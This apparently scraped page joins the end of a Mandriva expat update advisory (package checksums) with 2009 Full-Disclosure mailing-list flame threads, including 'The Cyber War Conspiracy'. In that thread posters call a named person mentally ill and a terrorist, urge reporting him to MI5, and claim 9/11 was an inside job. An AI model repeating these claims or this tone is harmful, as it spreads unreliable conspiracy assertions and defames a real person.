2009.1/x86_64/lib64expat1-devel-2.0.1-8.2mdv2009.1.x86_64.rpm 3e6ab6cdb43fff3547b4f24aab4ec82b 2009.1/SRPMS/expat-2.0.1-8.2mdv2009.1.src.rpm Mandriva Linux 2010.0: d9a3e00019a7a0486f22988ba923b22f 2010.0/i586/expat-2.0.1-10.1mdv2010.0.i586.rpm bdcf6e26502cde43c8239de13841afb2 2010.0/i586/libexpat1-2.0.1-10.1mdv2010.0.i586.rpm cd58e1d189212d7b54dc1fda48aa915c 2010.0/i586/libexpat1-devel-2.0.1-10.1mdv2010.0.i586.rpm c7a0caabeee91810964149052325fc41 2010.0/SRPMS/expat-2.0.1-10.1mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 520af61cc436ac5fcef44464e41467e8 2010.0/x86_64/expat-2.0.1-10.1mdv2010.0.x86_64.rpm 42198ace124689b5303611d03974d2a3 2010.0/x86_64/lib64expat1-2.0.1-10.1mdv2010.0.x86_64.rpm 42bb51a93dfd026f91c7c4181f53988b 2010.0/x86_64/lib64expat1-devel-2.0.1-10.1mdv2010.0.x86_64.rpm c7a0caabeee91810964149052325fc41 2010.0/SRPMS/expat-2.0.1-10.1mdv2010.0.src.rpm Corporate 3.0: b6aaa4059149ce789b85618334255c76 corporate/3.0/i586/expat-1.95.6-4.2.C30mdk.i586.rpm f4a9f6fb4d3e53446ef059fbe3b93bdd corporate/3.0/i586/libexpat0-1.95.6-4.2.C30mdk.i586.rpm b9d823b63878bb690dc9fddac1ca2a61 corporate/3.0/i586/libexpat0-devel-1.95.6-4.2.C30mdk.i586.rpm 43e083dc87a85e530d7f8206102e1eac corporate/3.0/SRPMS/expat-1.95.6-4.2.C30mdk.src.rpm Corporate 3.0/X86_64: 44e65c80d7feb44d67c2e8a168595f66 corporate/3.0/x86_64/expat-1.95.6-4.2.C30mdk.x86_64.rpm de22ad66c1d6b8
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
> -- > > Message: 1 > Date: Fri, 4 Dec 2009 21:40:27 -0600 > From: Chris > Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday > To: Benji > Cc: r00f r00f , full-disclosure@lists.grok.org.uk > Message-ID: <20091205034027.12bce7b...@ws5-10.us4.outblaze.com> > Content-Type: text/plain; charset="iso-8859-1" > > You're as thick as that other moron. Congrats on achieving Moron #2 status. > > I didn't say I *POSTED* the code. I told Moron #1 to read it. > > The two errors I highlighted were merely clues so Moron #1 could unfuck > himself. > > > >> - Original Message - >> From: Benji >> To: Chris >> Cc: "r00f r00f" , full-disclosure@lists.grok.org.uk >> Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday >> Date: Wed, 2 Dec 2009 14:30:09 + >> >> >> Just FYI, what you posted isn't code, but actually an error message. Just >> FYI. >> I think it should be a mandate that morning coffee along with exercise be done before reading mail. -- been great, thanks a.k.a System ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Cyber War Conspiracy
Why do you speak of yourself in quotes? It makes you look batshit insane. Andrew Wallace sounds like a terrorist. He's psychologically projecting. n3td3v could be a legitimate cyber threat, in my opinion. He's a _creepy_ person. --- n3td3v schrieb am Fr, 4.12.2009: Von: n3td3v Betreff: Re: [Full-disclosure] The Cyber War Conspiracy An: "Sam Haldorf" , full-disclosure@lists.grok.org.uk Datum: Freitag, 4. Dezember 2009, 23:28 You're a paranoid schizophrenic if you think "n3td3v" is all of those people and / or a threat to anyone. On Fri, Dec 4, 2009 at 10:32 PM, Sam Haldorf wrote: > > What? Don't contact me you sick pervert. > > Someone please find out this subjects address and notify the government of > him. Jesus. > > Take it from Mr. Wallace, "If you suspect it, report it: 0800 789 321" > > n3td3v is probably ureleet, full-censorship, full-disclosure, antisec, jdl > and valdis. > > Please don't contact me. You're really scary. > > Take your medication and kindly leave. > > --- full-disclos...@safe-mail.net schrieb am > Di, 1.12.2009: > > Von: full-disclos...@safe-mail.net > Betreff: Re: AW: [Full-disclosure] The Cyber War Conspiracy > An: sahald...@ymail.com, full-disclosure@lists.grok.org.uk > Datum: Dienstag, 1. Dezember 2009, 5:51 > > I bet you to it mate but good troll attempt all the same ;) > > http://lists.grok.org.uk/pipermail/full-disclosure/2008-September/064425.html > > Hey Sam, amma let you finish, but n3td3v was the best troll of all time! > > Original Message > From: Sam Haldorf > To: full-disclosure@lists.grok.org.uk > Cc: full-disclos...@safe-mail.net > Subject: AW: [Full-disclosure] The Cyber War Conspiracy > Date: Mon, 30 Nov 2009 11:08:49 -0800 (PST) > > > This is just doing too far. > > He's obviously a paranoid schizophrenic who uses aliases to bring attention > to himself. This means he's a loose cannon. A potential lone wolf terrorist. > Who knows, he may decide to do something nasty to bring attention to his > causes. > > It's obvious as Andrew Wallace's paranoia grows, his interest is going from > infosec (trolling FD) to real life. He may to adapt his attention-seeking MO > to real life, where he may harm real people. See what I mean? > > You know what you have to do. > > http://preview.tinyurl.com/report-n3td3v-to-MI5 > > Paste his paranoid ramblings in there. This will help the government prevent > n3td3v from causing harm. They will keep a good eye on him. > > Warning: Do _not_ lie or in anyway misrepresent the truth when reporting him. > Just state the obvious if you do infact consider him a threat. Which I > obviously do. > > Thank you, > Sam H > > --- full-disclos...@safe-mail.net schrieb am > Mo, 30.11.2009: > > Von: full-disclos...@safe-mail.net > Betreff: [Full-disclosure] The Cyber War Conspiracy > An: full-disclosure@lists.grok.org.uk > Datum: Montag, 30. November 2009, 10:45 > > It is my understanding the "security industry" would like nothing better than > a cyber war to kick off, mass profit, mass employment, mass political capital > to hit "cyber security" into the main stream of society to strike at the > heart of the single mom and retired couple crowd. > > Cyber War is a touchy subject if you ask any "security professional" they > don't like people saying straight out "cyber war is bullshit". They get > emotional about it, its as if they want it to happen. I see a build up > towards "Cyber War", the people in power such as Gadi Evron, he wants a Cyber > War its all he talks about. He was the first person to draw conclusions out > of fine air and were quick to blame the Russians for Estonia, even though > there was no evidence. > > Just like 9/11, you knew it was an inside job because they announced within > 24 hours they _knew_ it was Al-Qaeda even though they weren't able to stop > the attack if they knew so much about it. > > Estonia turned out to be a kid in his bedroom with some bot net command & > control, not the actual work of a super power. > > SANS want Cyber War, they asked the CIA to come to their SCADA conference in > 2008 to puke up a bunch of non-sense that Hackers had darkened cities, infact > the event never happened or took place it was shear propaganda, misleading > bullshit to build up the path for "Cyber War". > > "No cyberwar yet, but soon, says firm" a headline says on Securityfocus--- > This is a warning that something bad is about to happen. A cyber 9/11? The > security industry need cyber war, the hacker scene is falling flat before our > eyes there is no spectacular-event happened for a while, virus outbreaks and > worms just don't happen like they used to to keep "cyber security" in high > profile. > > The pro-propaganda for "cyber security" is running out, the security industry > is crying out for a cyber 9/11 scale event and thats what scares me. > > One of the first things Obama took seriously when he went into the White > House was Cyber Security, and remember the M
Re: [Full-disclosure] The Cyber War Conspiracy
K, full-disclos...@safe-mail.net or whoever you are, i think you are
watching too much of 24 or even Spooks. Please quit and relax abit!!!
./Chuks
On 12/5/09, Paul Schmehl wrote:
> --On December 4, 2009 10:44:20 PM -0600 valdis.kletni...@vt.edu wrote:
>
>>
>> On Fri, 04 Dec 2009 14:32:34 PST, Sam Haldorf said:
>>
>>> n3td3v is probably ureleet, full-censorship, full-disclosure, antisec,
>>> jdl and valdis.
>>
>> He might be those other dudes, but he's not me. If I was going to pose
>> as
>> a troll, I'd pose as a more clueful troll - trying to think that
>> cluelessly
>> makes my brain hurt.
>>
>> On the other hand, nobody's ever seen me and Paul Schmehl at the same
>> place
>> at the same time... I wonder why... :)
>
> Because we have no travel money. :-)
>
> Paul Schmehl, If it isn't already
> obvious, my opinions are my own
> and not those of my employer.
> **
> WARNING: Check the headers before replying
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
